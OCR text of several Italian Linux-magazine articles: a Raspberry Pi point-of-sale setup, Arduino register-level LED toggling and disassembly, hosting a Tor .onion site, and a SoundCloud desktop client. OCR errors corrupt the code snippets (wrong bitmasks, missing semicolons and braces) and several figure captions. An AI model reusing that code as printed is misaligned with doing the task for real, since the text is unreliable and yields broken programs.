collegato ad una stampante di scontrini, in modo da fornire all’utente 
finale una ricevuta d’acquisto. Ne esiste una prodotta da Adafruit, 
che si può trovare sul Web cercando “thermal receipt printer”, e che 
costa meno di 40 euro. La stampante va collegata soltanto ai pin 
GND e Tx del Raspberry Pi, come si vede nello schema in Fig. 2. 
Per rendere il tutto più completo e simile ad un classico registratore 
di cassa, si può poi aggiungere un relay che gestisce l’apertura del 
cassetto per inserire il denaro incassato. 


CONFIGURAZIONE IN CORSO 


Per cominciare a configurare il proprio registratore di cassa 
basta lanciare da terminale il comando iofstock ed utilizzare le 
credenziali di accesso predefinite: admin 
e linux, rispettivamente come username e 
password. Ovviamente, per garantire un 
grado più elevato di sicurezza, possono 
essere modificate in seguito. L’interfaccia 
(Fig. 3) è costruita a schede e permette di 
aggiungere nuovi prodotti all’interno del 
negozio. 

La scheda Products permette di gestire i 
prodotti del proprio negozio, mentre Quick 
Plots (Fig. 4) offre grafici che indicano 
quali merci vengano vendute più spesso: 
un’ottima visione che ci permette di capire 
quali siano i prodotti più in voga e quelli 
che forse è meglio evitare di continuare a 
vendere perché non apprezzati dai clienti. 
Quando si crea un prodotto è anche 
possibile stampare il suo codice a barre, 
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&Fig. 3 * L'interfaccia grafica di IOTPOS è semplice e intuitiva, anche grazie alla presenza 
di immagini che permettono di identificare più velocemente i prodotti 


con la stessa stampante per gli scontrini, così da applicarlo 
sulla confezione del prodotto stesso. Nel caso in cui volessimo 
consentire agli utenti di pagare autonomamente, dunque creare 
una cassa automatica, collegando il Raspberry Pi ad uno schermo 
touch si può offrire ai propri clienti un’interfaccia utente molto 
semplice. L’interfaccia si apre lanciando il programma IoTPOS, 
e presenta i vari prodotti corredate da immagini esplicative 
(consentendo dunque una rapida individuazione del prodotto 
da “scontrinare”’). Per scegliere un prodotto basta cercarlo 
nell’elenco, oppure scrivendo il nome nella barra di ricerca, e 
cliccarci sopra (o toccandolo, se con è presente uno schermo 
touchscreen). Si può anche usare un qualsiasi lettore di codici 
a barre USB per scansionare il codice a barre (stampato, come 
abbiamo già consigliato in precedenza). Alla fine, il dispositivo 
stampa uno scontrino, che può essere consegnato all’utente. 
Naturalmente, per quanto riguarda il venditore, il programma 
mantiene tutta la contabilità, quindi nel caso di controlli fiscali 
è sufficiente offrire i tabulati delle vendite. 
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® Fig. 4 e Con la funzionalità Quick Plots è possibile ottenere le statistiche di vendita 
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Wiring non è l'unico modo per programmare la scheda logica. Possiamo scavare 
più a fondo e comunicare con Arduino anche in Assembly. Quali sono i vantaggi? 


ome molti di noi sapranno già, la scheda di prototipazione 

Arduino, così come il solo microcontrollore stand-alone 

(per semplicità, yC) può essere programmata utilizzando 
l'IDE appositamente sviluppato dal team che si preoccupa di tenere 
in vita il progetto. Ma, con l'avanzare delle abilità di programma- 
zione in ambito Arduino, crescono anche le esigenze e, special- 
mente per alcuni progetti, potrebbe essere necessario voler agire 
direttamente al livello di istruzioni del uC. È possibile farlo? E, 
soprattutto, scrivere in questa maniera un programma può essere 
davvero utile e conveniente? 


DALLO SKETCH AL BINARIO 


Per rispondere a questi interrogativi occorre prima di tutto cono- 
scere la dinamica di caricamento di un programma dall’IDE alla 
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Bit 7 6 5 


0105 (0125) PORTE 


Read'Write RAN RW RAV RAV RW 


Initial Value o ) [*} (o) 0 


DDRB — The Port B Data Direction Register 
Bit 7 6 5 4 3 


004 (0124) DOEI_] DORE 
RAW RAV RW 


Read/Write 
Initial Value (1) 0 0 0 (o) 


® Fig. 1 » Corrispondenze tra i pin del pC e l'uscita della scheda Arduino Uno 
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memoria del yC, poiché solo così possiamo affrontare alcuni aspet- 
ti per certi versi indispensabili alla comprensione dei passaggi che 
poi seguiranno. Nel momento in cui in Arduino IDE clicchiamo 
sul pulsante Carica, nel back-end avvengono un certo numero di 
passaggi che trasformano il sorgente scritto in linguaggio di alto 
livello in una forma “comprensibile” dall pC: quello utilizzato in 
Arduino Uno, ad esempio, appartiene alla serie AVR della Atmel 
(www.atmel.com), ovvero una famiglia di yC RISC con architet- 
tura Harvard: questa famiglia di yuC fu la prima ad implementa- 
re all’interno del chip una memoria flash per poter memorizzare 
i programmi da eseguire e al tempo stesso a dare la possibilità 
all’utente di cancellare e riscrivere la memoria con un altro pro- 
gramma da eseguire. 

Il mondo Open Source, in questa evoluzione dell’elettronica, non 
è stato a guardare e per la famiglia AVR ha creato degli strumenti 
atti a supportarla e che oggi sono parte integrante dell’IDE Ardu- 
ino. Abbiamo così avr-gcc 
e avr-g++, i compilatori 
LESS La C/C++ di supporto per la 
na na suddetta famiglia, il qua- 
le produce un file oggetto 
(.0) dello sketch. A questo 
punto, il file oggetto viene 
linkato alle librerie neces- 
sarie — ed eventualmente 
a quelle richiamate nello 
sketch - e come risultato si 
avrà l’eseguibile completo 
in ELF. Acronimo di Exe- 
cutable, and Linkable 
Format indica il formato 
— quindi possiede determi- 
nate specifiche — oggi più 
usato per la memorizzazio- 
ne di file oggetto, program- 
mi eseguibili e librerie di- 
namiche su GNU/Linux. 
= Tale formato, però, non è 
0 idoneo ad essere carica- 
to ed eseguito dal uC. Per 
questo motivo, dopo la cre- 
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azione del file .elf, si ha l’intervento dell’eseguibile avr-objcopy, 
presente nel pacchetto cross-avr-binutils, il quale converte il for- 
mato .elf in dati comprensibili al uC (file .hex). Solo a questo punto 
il tool avrdude (man avrdude), fornito dall’omonimo pacchetto, 
effettua l'upload del codice .hex nella memoria del puC: ma qual è il 
formato in cui vengono memorizzati i dati? 


DEFINIZIONI OBBLIGATE 


Il significato della parola “registro” in un dizionario riporta: li- 
bro, quaderno di vario tipo in cui si scrive o riporta qualcosa. In 
elettronica, per certi versi, il significato non è differente poiché il 
registro è un dispositivo in grado di memorizzare informazioni e, 
all'occorrenza, fornire il contenuto a chi ne fa richiesta. Esistono 
diversi tipi di registri (istruzioni, controllo, stato) ma l’elemento di 
base che gli accomuna è flip-flop, un circuito che può presentare 
due possibili stati stabili (da cui il nome): stato logico 0 e stato lo- 
gico 1 permettendo così di memorizzare 1 bit (Binary digiT). Un 
registro è caratterizzato, oltre dal nome che evoca la funzione che 
svolge, anche dalla sua dimensione: si parla così di registri a 8 bit, 
a 16 bit e così via. Poiché per ogni bit è possibile codificare 2 infor- 
mazioni (stato 0 e stato 1), ecco che un registro a 8 bit può arrivare 
ad immagazzinare 248=256 informazioni. Analogo ragionamento 
per registri con dimensioni differenti. In un registro il bit LSB (Le- 
ast Significant Bit) indica il bit meno significativo, mentre il MSB 
(Most Significant Bit) il bit più significativo. Molto importante è 
anche la rappresentazione delle informazioni nel registro che può 
essere di tipo Little Endian e Big Endian. Nel Big Endian il byte 
più significativo dei dati viene inserito nel byte con l'indirizzo più 


‘ NUOVI” VOCABOLI 


È utile sapere che... 


Reduced Instruction Set Computer è l'acronimo di un 
processore progettato secondo la filosofia RISC la quale 
vede un numero ridotto di istruzioni semplici. In una 
siffatta filosofia, il compilatore dovrà essere in grado di 
spezzettare, ottimizzandole, le istruzioni più complesse 
in istruzioni più semplici - compatibili con il processo- 
re in uso - permettendo una esecuzione diretta senza 

la necessità di un interprete. Va da sé che iltempo di 
esecuzione delle istruzioni è molto ridotto se parago- 
nato alla filosofia CISC (Complex Instruction Set Computer) 
che mira ad avere una ISA (Instruction Set Architecture) 
complessa, ossia con più istruzioni le quali contengono 
molte operazioni di immagazzinamento e caricamento. 
La complessità dell'istruzione impone che esse venga- 
no decodificate prima di essere eseguite. Operazioni 
queste che necessitano di molti cicli macchina. Infine, la 
differenza tra l'architettura Harvard e von Neumann è che 
la prima presenta due banchi distinti di memoria una’ 
contenente i dati e l'altra Le istruzioni. La seconda invece 
ha un unico banco di memoria nella quale son presenti 
dati e istruzioni. 


Ad un pin GND 


® Fig. 2 e Collegamenti tra l’oscilloscopio e Arduino Uno 


basso. Il resto dei dati viene posto in ordine nei successivi byte 
con indirizzi più alti. Nel Little Endian il byte meno significativo 
dei dati viene inserito nel byte con l'indirizzo più basso. Il resto 
dei dati viene posto in ordine nei successivi byte con indirizzi più 
alti. Ad esempio, il numero decimale 258, in binario 00000001 
00000010, verrebbe immagazzinato nel formato Big Endian così 
come l’abbiamo scritto in binario. Nel formato Little Endian avreb- 
be invece il seguente ordine: 00000010 00000001. Ciò significa 
che trasferendo un formato Big Endian ad una macchina che utiliz- 
za il formato Little Endian, ma senza attuare alcuna conversione, 
questo verrebbe interpretato non come 258 ma come 513! Detto ciò 
abbiamo capito che, al di là dell’ordine, nei registri gli elementi 
sono rappresentati da una cifra binaria 0 o 1. 


LA PRIMA PROVA 


Se ora provassimo a dare un’occhiata veloce al datasheet di un uC 
ci renderemo conto come sia pieno di registri ognuno dei quali svol- 
ge specifiche funzioni a seconda dello stato dei singoli bit. Ma pro- 
cediamo con ordine con un esempio di codice scritto in linguaggio 
ad alto livello (quindi più “vicino” all’uomo che alla macchina) per 
poi scendere, livello dopo livello, nei meandri del codice al livello 
macchina. Quando si approccia per la prima volta la scheda Arduino 
Uno il primo esempio che si illustra, o che ci si trova davanti poiché 
riportato tra quelli basilari, è il lampeggio di un LED. 

Questo esempio permette, nella sua semplicità, di prendere subito 
confidenza da un lato con un risultato visibile e dall’altro con la strut- 
tura di base dello sketch e alcune funzioni che poi saranno inevita- 
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bilmente presenti in progetti più complessi. Ma c’è di più: lo stes- 
so esempio si presta per interessanti spunti dai quali partire per un 
approfondimento sul funzionamento dei registri e della risposta alla 
loro manipolazione ad opera del uC. Da ora faremo riferimento ad 
una Arduino Uno, scelta dettata dal fatto che l’uscita 13 della sche- 
da presenta un diodo led integrato. Non sarà così necessario cablare 
alcun circuito, ma nessuno vieta di costruire una propria versione 
stand-alone così come riportato nel numero 165 di Linux Maga- 
zine (Gennaio/Febbraio 2016). Dalla Fig. 1 — in alto - osserviamo 
come l’uscita 13 della scheda — numerazione in viola - corrisponda 
al pin 19 del pC. Come evidente dalla stessa figura ogni pin del yC 
può essere caratterizzato da funzioni multiple: generazione PWM 
(Pulse-Width Modulation), ingressi analogici per la conversione 
in digitale (ADC - Analogic to Digital Converter), collegamento 
all’oscillatore al quarzo (pin 9 e 10 del uC), pulsante di reset (pin 1), 
ecc. Premesso ciò carichiamo l’esempio che segue, ovvero un lam- 
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peggio di un LED: 


void setup() 

{ 
pinMode(13, OUTPUT); 

} 

void loop() 

{ 
digitalWrite(13, HIGH); 
digitalWrite(13, LOW); 


Colleghiamo all’uscita 13 di Arduino Uno un oscilloscopio. Nulla 
di complicato, ma per facilitare la prova riportiamo il collegamen- 
to in Fig. 2. L'uso dell’oscilloscopio esula dal questo contesto, per- 
tanto diamo per scontato che lo si sappia usare senza fare danni. Il 
programma, semplicemente, accende e spegne il LED commutando 
senza alcun ritardo l’uscita 13 da uno stato logico basso a uno stato 
logico alto e viceversa. L’output dell’oscilloscopio (Fig. 3) riporta 
una frequenza di commutazione dell’uscita di 105 KHz. 

Rispetto al classico programma Blink.ino sono stati rimossi i ritar- 
di cancellando le funzioni delay(). La scheda Arduino Uno viene 
fatta funzionare alla velocità di 16 MHz, ma in questo caso pur non 
essendoci alcun ritardo intenzionale la velocità non è la massima o 
prossima a essa. Perché? 


LA SECONDA PROVA 


Facciamo lampeggiare sempre il LED all’uscita 13 ma senza utilizzare 
le chiamate alle funzioni precedenti. Come procedere? Utilizziamo i 
registri dedicati manipolando direttamente le uscite. In luogo del codi- 
ce precedente, modifichiamo solo il loop nel modo che segue: 


void loop() { 
PORTB |= B0010000 
PORTB &= Bl11011111 


Per comprendere queste due righe guardiamo la Fig. 1: l’uscita 13 
della scheda corrisponde al pin 19 il quale, tra le varie funzioni, vede 
PBS5 ad indicare il bit numero 5 del registro PORTB (la numerazione 
parte da 0). Ognuno degli 8 bit di questo registro controlla lo stato 
di uscita del pin corrispondente: a pagina 104 del datasheet (www. 
edmaster.it/url/7191) sono riportate tutte le funzioni alternative del 
registro medesimo, mentre a pagina 428 l’elenco di tutti i registri 
presenti nell’ATMega328P. Poiché la variabile PORTB associata 
all'omonimo registro contiene tutti gli otto bit, dobbiamo assicurarci 
di non alterare gli altri bit quando assegniamo un valore al registro. 
Per questo motivo effettuiamo un OR logico bit a bit (bitwise or 
operation) con il contenuto del registro previo uso della maschera 
di bit riportata che isoli solo lo stato PBS: l’istruzione è equivalente 
a PORTB=PORTB | 00100000. Analoga considerazione per la se- 
conda riga, solo che qui eseguiamo un AND logico bit a bit affinché 
il bit venga portato a 0, equivalente a PORTB=PORTB & 11011111. 
I valori possono essere indicati anche in esadecimale: 0x20 per la 
prima riga e Oxdf per la seconda. Caricando questo codice e ese- 


guendo la medesima misura noteremo come ora l’oscilloscopio for- 
nisca (Fig. 3) una frequenza pari a 943 kHz, circa 9 volte superiore. 


ALTRE PROVE ANCORA 


Ora che abbiamo capito la dinamica, cambiamo il loop nel modo che segue: 


void loop() { 

while(1) { 
PORTB |=B00100000; 
PORTB &=B11000000; 


Abbiamo riportato le istruzioni di accensione e spegnimento all’inter- 
no di un loop infinito creato con l’istruzione while(1). Carichiamo il 
codice, eseguiamo la misura con l’oscilloscopio e dalla Fig. 3 possia- 
mo leggere una frequenza pari a 2,28 MHz, circa 2,5 volte superiore 
alla precedente e 23 volte rispetto alla prima. La quarta prova vede il 
seguente codice: 


void loop() { 


while(1) { 
PORTB=1<<5; 
PORTB=0; 

} 


La prima riga riporta l’operatore binario di scorrimento a sinistra: il 
valore dell’operando di sinistra viene spostato di un numero di posi- 
zioni pari all’operando di destra. Dopo averlo caricato nel pC l’oscillo- 
scopio fornirà una frequenza di ben 4,07 MHz (Fig. 4), quasi il doppio 
della precedente e ben oltre 40 volte rispetto alla prima prova. Cer- 
chiamo di capirne di più. 


PIÙ VICINI ALLA MACCHINA! i 


Dal punto di vista intuitivo è evidente che la funzione digitalWrite() 
non è una singola istruzione ma una chiamata a una funzione in C che 
effettua un certo numero di verifiche prima di portare il pin corrispon- 
dente allo stato richiesto. La definizione di tale funzione è presente, ad 
esempio in una OpenSUSE, per coloro che volessero leggerla, dopo aver 
installato IDE Arduino, nel file wiring_digital.c nel percorso /usr/ 
share/java/Arduino-1.8.5/hardware/arduino/avr/cores/ardui- 
no/. Volendo entrare un po’ più nel dettaglio ritorniamo all’output forni- 
to nel terminale dell’IDE quando si fa la verifica dello sketch. Tra i tanti 
messaggi che si susseguono uno è di particolare interesse: quando viene 
creato il file .elf con una chiamata del tipo (output semplificato): 


/usr/bin/avr-gcc -o /tmp/build<lettere numeri>.tmp/ 
NomeFile.ino.elf 


Viene riportato il percorso di creazione del file .elf ovvero dell’ese- 
guibile che una volta convertito viene caricato nel uC. Ma il file .elf 
contiene codice oggetto, e allora possiamo pensare di disassemblarlo 


Micoz=k=ce-="tr l-t+a-sb 


al fine di vederne le istruzioni mnemoniche che poi verranno cari- 
cate nella memoria del uC. Questo passaggio è possibile grazie alla 
presenza del tool avr-objdump (man avr-objdump) a corredo 
delle binutils avr. Spostiamoci nella cartella dove viene creato il 
file self, apriamo un terminale e lanciamo il comando avr-objdump 
-d Nome_File.ino.elf per vedere il codice Assembly dello sketch 
(Fig. 4). Oltre alla frequenza differente abbiamo anche una asim- 
metria dell’uscita, da cosa è dato questo comportamento? A pagina 
432 del datasheet (capitolo 36, Instruction Set Summary) l’ultima co- 
lonna della tabella riporta il numero di cicli di clock macchina ne- 
cessari per portare a termine l’istruzione. Se osserviamo la sezione 
<loop> del disassemblato (Fig. 4), al centro vediamo come venga- 
no richiamate le medesime istruzioni in una modalità per così dire 
“simmetrica”. Infatti, l’output ha la stessa durata nei due stati logici. 
Non è così per il disassemblato in basso nel quale già la presenza 
dell’istruzione SBI (Set Bit in I/O Register) necessita di 2 cicli macchi- 
na per poter essere portata a termine determinando così l’asimmetria 
tra i due stati logici. Per ora ci fermiamo qui, quanto visto è il punto 
di partenza per affrontare l’Assembly degli AVR e che inizieremo a 
scoprire dal prossimo appuntamento. 
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® Fig. 4 © Risultato della quarta prova e contenuto dei file oggetto 
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GREA IL TUO SITO... 
NEL DARK WEB! 


Chi l'ha detto che Tor è utile solo per navigare senza lasciare tracce? Usalo anche 
per creare un Hidden Service e metti on-line un sito irrintracciabile e anonimo 


hiunque abbia a cuore la propria 

privacy sa che è possibile navigare 

utilizzando la rete Tor per accedere 
in modo anonimo al Web, accedendo ad 
un cosiddetto deep Web (o dark Web) 
nel quale non soltanto i client ma anche i 
server sono completamente anonimi. Ma 
è possibile utilizzare la famosa rete “a 
cipolla” anche come server, cioè per offrire 
ad altre persone dei contenuti? Certo. Il 
bello di avere un web server che funziona 
sulla rete Tor, cioè un cosiddetto sito Web 
Onion, è che non siamo identificabili: gli 
utenti del nostro sito Web non possono 
risalire al nostro indirizzo IP reale, e 


quindi non ci possono identificare. Allo 
stesso modo, nessuno (noi compresi) può 
identificare gli utenti del nostro sito: tutti 
sono assolutamente anonimi. I siti Web con 
dominio .onion sono per l'appunto anonimi 
e costituiscono il dark Web, che è un 
sottoelemento del deep Web. Quest'ultimo, 
più in generale, rappresenta tutti quei siti 
non rintracciabili dai normali motori di 
ricerca ma, all’interno del deep Web, il dark 
Web è statisticamente la parte più ampia e 
interessante (esistono comunque anche 
siti privati, che non sono accessibili da 
chiunque pur non essendo anonimi) e per 
questo i due termini sono spesso usati come 


Connettiamoci alla rete Tor 


Tutto inizia con l'avvio del client Tor ufficiale 


Documentation Preso Blog Contact 


sinonimi. L'anonimato offerto dai server 
.onion può non essere particolarmente 
importante per un normale cittadino 
italiano, ma è fondamentale per chi si trova 
in Paesi che limitano la libertà di stampa: 
un cittadino ucraino, ad esempio, avrebbe 
potuto (durante la rivoluzione) pubblicare 
un sito Tor con notizie sui crimini del 
governo, senza il rischio di essere scoperto 
ed arrestato. Per fare un altro esempio, la 
procedura di invio dei file a Wikileaks da 
parte degli informatori funzionava proprio 
usando un server web Tor. Considerata la 
struttura “a cipolla”, il client Tor può essere 
utilizzato sia per accedere a dei servizi 
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IL PIÙ RECENTE 

Nei repository delle principali distro, Tor è sempre 

presente. Tuttavia, spesso capita che non si tratti di 
una versione particolarmente recente. Il nostro consiglio è quello 
di scaricare il software dalla pagina www.edmaster.it/url/7180. 
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BASTA UN CLIC 

Basta scaricare il file .tarnxz ed estrarlo. Si otterrà 

una cartella Browser e un file chiamato .desktop. È 
possibile avviare Tor con un semplice clic su questo file, senza 
bisogno di alcuna installazione. 


Abilitiamo 


Rendiamo il PC raggiungibile dalla rete Tor 


LA CONNESSIONE 
01 La prima finestra che appare permette di configu- 
rare la connessione ad Internet: nel caso ci si trovi 
dietro ad un proxy [come nelle reti aziendali), può essere ne- 
cessario cliccare su Configure. Altrimenti, basta cliccare su 
Connect per iniziare la connessione a Tor. 


How 
gue ee 0) 6 0 [1 da 


per > Lavbkiocionae > tardrosier ani > fevmiar > Torlewener P Dita > Fer 


A [N 


UN FILE DI TESTO 
0: i Per abilitare il proprio Hidden Service è necessario 
| aprire il file che si trova nella cartella Browser/Tor- 
Browser/Data/Tor/torrc con un editor di testo, e inserire alla fine 
di esso le righe presenti sulla pagina www.edmaster.it/url/7181. 


Hidden Service 


"+ » 
o si 


he nai i n e pon mi oi Cc è DR N lr 


Welcome to Tor Browser (e: 


È vini are ne fre to n 


What Mext? You Can Molpi a 
fammi 1, Gite 


IL TOR BROWSER 
02 Dopo qualche minuto la connessione sarà attiva, 
e apparirà la finestra di Tor Browser, un'apposita 
versione modificata di Firefox. Il servizio Tor rimarrà attivo 
finché Tor Browser è aperto: se lo si chiude, anche la connes- 
sione a Tor viene terminata. 


Ere MI Mi I Me RI 
a 7 nerve ans 


» CARTELLA DEI DATI 
0 In questo modo si indica come server quello che viene 
ospitato sulla porta 80, e come cartella dei dati /home/ 
luca/tor-browser_en-US/hidden_service/. Ovviamente, si possono sce- 
gliere una directory e una porta (FTP funzionerebbe sulla porta 21). 


che per proporne di propri al resto della 
rete. Infatti, Tor è un protocollo di Onion 
routing, un tipo di rete simile a una VPN, 
con una differenza importante: ci sono 
molti passaggi intermedi. 

Una VPN è di fatto una sorta di rete locale 
molto estesa sul territorio: tutti i PC si 
collegano a uno stesso server centrale che 
funziona come un router domestico e tiene 
assieme tutti i vari computer permettendo 
loro di condividere informazioni e un 
unico indirizzo IP pubblico. Quest'ultimo è 
quello del server, quindi ogni client appare 
sul Web con il suo indirizzo. Nell’Onion 
routing esistono molti passaggi intermedi: 


in pratica, un client si collega a un server, 
il quale si collega a un altro, poi un altro, e 
così via fino a un server finale che funziona 
come “punto di uscita” (un exit node). Il 
client apparirà sul Web con l’indirizzo IP 
del punto di uscita, ma nessuno dei vari 
punti intermedi può risalire a chi sia il 
client e quale il nodo di uscita: ogni nodo 
intermedio della rete sa soltanto chi c’è 
prima di lui e chi dopo, ma non sa in che 
punto esatto della rete si trovi, quindi non 
sa se sta dialogando con il primo o l’ultimo 
computer della sequenza. L’idea ricorda 
un po’ le reti Mesh, con la differenza che 
in queste solitamente è possibile per tutti i 


computer essere punti di uscita per qualcun 
altro e non si può scegliere il proprio punto 
di uscita. 

Invece, nell’Onion routing i punti di uscita 
sono solo alcuni dei PC coinvolti, e un 
client può cambiare exit node se desidera 
apparire con un indirizzo IP differente da 
quello che ha avuto finora. 

Inoltre, nell’Onion routing c’è un apposito 
sistema crittografico: un sistema a cipolla 
(il nome non è casuale, del resto). Ogni 
router intermedio si presenta al client con 
una chiave crittografica pubblica, che può 
essere usata per crittografare i pacchetti. 
Immaginiamo che un client riceva le chiavi 
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DE GRUYTER OPEN 


Proceedings on Privacy Enhancing Technologies ; 2016 (4):454-469 


Mauro Conti, Stephen Crane, Tommaso Frassetto, Andrei Homescu, Georg Koppen, Per Larsen, 
Christopher Liebchen, Mike Perry, and Ahmad-Reza Sadeghi 


Selfrando: Securing the Tor Browser against 
De-anonymization Exploits 


Abstract: Tor is a welkknown anonymons commnnica 
tion system used by millions of users, including jour- 
nalîsts and civil rights activists all over the world. The 
Tor Browser gives non-technical users an casy way t0 
access the Tor Network. However, many government or- 
ganizations are actively trying to compromise Tor not 
only in regions with repressive regimes but also in the 
free world, as the recent FBI incidents clearly demon- 
strate. Exphiting software vulnerabilities in general, 
and browser vulnerabilities in particular, constitutes a 
clear and present threat 10 the Tor software. The Tor 
Browser shares a large part of its attack surface with the 
Firefox browser. Therefore, Firefox vulrierabilities (even 
patched ones) are highly valuable to attackers trying to 
monitor users of the Tor Browser. 

In this paper, we present selfrando—an enhanced and 


1 Introduction 


The Tor Project provides a suite of free software and 
a worldwide network designed to facilitate anonymous 
information exchange and to prevent surveillanoe and 
fingerprinting of these interactions. The Tor network 
is open to anyone and widely used by civil rights ac- 
tivists, whistleblowers, journalists, citizens of oppressive 
regimes, etc. Many sensitive websites, including the late 
Silk Road black market, are only accessible over Tor. 
Consequently, the Tor Network is continually facing de- 
anonymization attacks by law enforcement, intelligence 
agencies, and foreign nation states. A de-anonymization 
attack aims to disclose information, such as the identity 


or the location, of an anonymons user. While many de- 
anonymization attacks rely on weskmesses in the net- 


Fig. 1 Le ultime versioni di Tor Browser contengono Selfrando, sistema sviluppato dall'università di Padova per 
proteggere il programma dall'esecuzione remota di codice 


di 4 diversi router: il client preparerà un 
pacchetto crittografandolo con la chiave 
4, la chiave 3, la 2, e infine la numero 1. 
Il pacchetto verrà poi inviato ai vari router 
in sequenza, che lo potranno decifrare man 
mano: il primo router toglierà soltanto la 
crittografia con la propria chiave privata 
1, il secondo con la chiave privata 2, ecc. 


File Modifica 
Azioni 

C-T: Menu 
aptitude @ 


Visualizza Segnalibrì 
Pacchetto. Risoltutore 


Ui Cerca 
Help .g: Quit 


libapache2-mod-php5 php5-mcrypt. 
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Impostazioni 


Opzioni 
U: Update g: Preview/Donntoad/Install/Remove 


Ora è ovviamente necessario installare il server: 

se si vuole un server Web, l'opzione probabilmen- 
te più scontata è Apache2, che può essere installato su siste- 
mi Debian con il comando sudo apt-get install apache2 php5 


In questo modo, gli unici a poter vedere i 
dati non crittografati sono il client e l’exit 
node (e se si utilizza un protocollo come 
HTTPS nemmeno l’exit code può vedere 
i dati completamente decifrati, potrà farlo 
soltanto il vero destinatario). Le varie 
crittografie sono infatti applicate a strati 
come in una cipolla, e devono essere tolte 


Aiuto File 
Viste Aiuto 


Modifica 


be già esistere. 


Visualizza 


esattamente in quell’ordine. 
Se qualcuno provasse a intromettersi 
il procedimento salterebbe e i dati 


diventerebbero automaticamente illeggibili, 
rendendo quindi tutta la comunicazione 
privata e di fatto anonima perché nessuno 
sa chi sia davvero ad avere cominciato la 
connessione. 


Segnalibri 


Impostazioni Aiuto 


Lanciando il comando cat /etc/apache2/sites- 
enabled/000-default.conf, la riga DocumentRoot 
indica il percorso nel quale si possono inserire i vari file, 
ad esempio la cartella /var/wwws. Il file index.html dovreb- 


COME SI ACCEDE 
AL SERVER ONION 


Per accedere ad un server Onion non si 
utilizza un indirizzo IP, ma un nome di 
dominio che viene creato in modo casuale 
sulla base di una altrettanto casuale e 
univoca chiave crittografica. Si tratta 
della chiave crittografica pubblica che 
permette ad altri client di crittografare, 
come abbiamo spiegato, i pacchetti di 
dati in modo che soltanto il nostro server 
sia in grado di leggerli usando la chiave 
privata di decifratura. Tutto quello che 
si deve fare per rendere il proprio client 
accessibile dalla rete Tor è selezionare le 
porte da “aprire” al resto del dark Web. 

C’è però una differenza importante con 
i server che si abilitano sul proprio PC 
per l’accesso dal Web convenzionale: 
non si passa attraverso il meccanismo 
del NAT, perché il client Tor è già 
connesso direttamente alla rete Onion. 
Le normali reti locali casalinghe sono 
infatti gestite da un router, e sono quindi 
“nattate”: questo significa, in parole 
povere, che l'unico computer visibile 
direttamente da Internet è il router stesso. 
Gli altri dispositivi della rete non sono 
normalmente visibili, e le loro porte di 
comunicazione (il server web utilizza 


la numero 80) sono chiuse. È quindi 
fondamentale, se vogliamo che il nostro 
server sia raggiungibile da Internet, 
aprire la porta 80 del nostro PC. Questa 
procedura è detta “port forwarding”: se 
controlliamo il manuale del router in 
nostro possesso troveremo sicuramente 
una pagina in cui viene spiegato come 
eseguirla. Tuttavia, su rete Tor il server 
funziona anche se non abbiamo abilitato 
il port forwarding, perché la connessione 
viene gestita direttamente dalla rete 
Onion. Anzi: è molto meglio non aprire 
la porta 80 sul router. Così, l'unico modo 
per accedere al server sarà tramite la rete 
Tor: un utente (e questo vale anche per 
i programmi di scansione automatica 
come Echelon o Prism) che si trova su 
Internet (e che quindi può leggere il 
nostro vero indirizzo IP) non sarebbe in 
grado di entrare nel sito. Se aprissimo 
la porta sul nostro router casalingo, il 
nostro server diventerebbe accessibile 
dal Web normale, non anonimo, e prima 
o poi qualcuno lo troverebbe (potrebbe 
finire, ad esempio, sul motore di ricerca 
Shodan). Se la teniamo chiusa, l’unico 
modo per arrivare al nostro server web 
sarebbe proprio attraverso il client Tor 
che abbiamo attivato sul computer. 


TOR BROWSER 
SANDBOXED 


È importante ricordare che l'anonima- 
to non è una merce che si può com- 
prare o ottenere con il clic di un pul- 
sante. È una condizione’ alla quale si 
arriva prendendo tutte le precauzioni 
ragionevoli. Se pubblichiamo un sito 
nel dark Web con Tor, ma in una delle 
sue pagine inseriamo il nostro profilo 
Facebook è ovvio che non saremo co- 
munque anonimi. 

In seguito alle ultime rivelazioni sui 
malware sviluppati dall'americana CIA 
per spiare gli utenti, è diventato sem- 
pre più importante proteggersi dagli 
attacchi che cercano di forzare la sicu- 
rezza di Tor. 

Esiste una versione più sicura del Tor 
Browser, chiamata Tor Browser San- 
dboxed, che per l'appunto chiude Tor 
e il browser in una sandbox per evitare 
che possano essere usati per accede- 
re ad altre parti del nostro computer. 


Maggiori informazioni sono  di- 
sponibili sulla pagina Web 
www.edmaster.it/url/7182. 
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Per conoscere l'indirizzo del sito Web sulla rete 

Onion, accessibile anonimamente tramite rete 
Tor, basta leggere il contenuto del file tor-browser_en-US/ 
hidden_service/hostname. È l'indirizzo che si può condivide- 
re, anche sui motori di ricerca. 


Inserendo l'indirizzo su un Tor Browser è possi- 

bile visualizzare il sito appena creato. Per assi- 
curarsi che sia accessibile solo tramite rete Tor, e non sul 
“classico” Web, una buona idea è chiudere la porta 80 sul 
proprio router. 
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li internauti più incalliti e gli appassionati 
(3° musica conosceranno già SoundCloud, 
la piattaforma che consente ai musicisti 
di distribuire gratuitamente tutti i brani prodotti. 


Ed è quasi superfluo aggiungere che, considerata 
la grande mole di utenti che quotidianamente 


popolano SoundCloud, la visibilità è assolùtamente 
garantita. Ma, mentte per altri OS è disponibile un 
client che consente di ascoltare tutti i brani senza 
tenere il browser aperto, sul Pinguino i software 
di questo genere mancano. O meglio, mancavano. 
Già, perché da poco tempo è venuto alla luce 


TUTTA LA MUSICA 
CHE VUOI TU! 


C'è un modo per ascoltare tutti i brani gratuiti 
di SoundCloud anche su GNU/Linux e senza tenere 
il browser aperto. Ecco come fare 


Auryo, un client non ufficiale che ci permette di 
ricercare e ascoltare i brani di SoundCloud senza 
dover tenere aperto Chrome o il browser che 
utilizziamo per navigare. Cos'altro aspettiamo? 
Rimbocchiamoci le maniche e configuriamo 
subito Auryo: bastano solo pochi minuti! 


L { 8 Dal nostro browser preferito (ad esempio Mozilla 
Firefox), raggiungiamo il sito Web http://auryo. 

com. Spostiamoci nella sezione Download e da qui clicchia- 
mo su Ubuntu [amd64) se la distro in uso è quella di Canoni- 
cal. In alternativa, optiamo per gli altri pacchetti disponibili. 


| auryo 
w A beautiful soundeloud desktop app 


installa 


Se stiamo utilizzando l'ultima release di Ubuntu, la 

17.10, possiamo installare Auryo direttamente dal 
Ubuntu Software. Ricerchiamolo dall'apposito campo di ricerca 
e confermiamo l'installazione semplicemente cliccando sul pul- 
sante Installa. 
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ubuntu@ubuntu: =/Scaricati 


Avviamo il terminale e spostiamoci nella directory 

nella quale abbiamo salvato il pacchetto di Auryo. 
